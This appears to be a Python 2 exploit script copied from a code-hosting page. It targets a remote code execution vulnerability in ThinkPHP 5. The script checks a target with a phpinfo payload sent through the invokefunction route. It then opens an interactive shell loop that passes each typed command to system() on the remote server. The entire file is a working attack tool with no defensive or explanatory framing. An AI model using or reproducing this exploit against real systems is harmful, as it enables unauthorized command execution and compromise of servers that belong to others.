/
tp5_rce_old.py
45 lines (37 loc) · 1.17 KB
/
tp5_rce_old.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# /usr/bin/env python
# -*- coding:utf-8 -*-
import sys
import requests
reload(sys)
sys.setdefaultencoding('utf-8')
def test(url):
payload = r"/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
url += payload
#print url
try:
r = requests.get(url)
if 'PHP Version' in r.text:
return True
else:
return False
except:
print '[!] Destination address cannot be connected'
return False
def exp(u):
while(1):
url = u
command = raw_input("fuhei@tp5_shell$ ")
if command != "exit":
payload = r"/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]="+str(command)
url += payload
r = requests.get(url)
print r.text
else:
break
if __name__ == '__main__':
url = sys.argv[1]
if test(url):
print "[+] Remote code execution vulnerability exists at the target address"
exp(url)
else:
print "[-] There is no remote code execution vulnerability in the target address"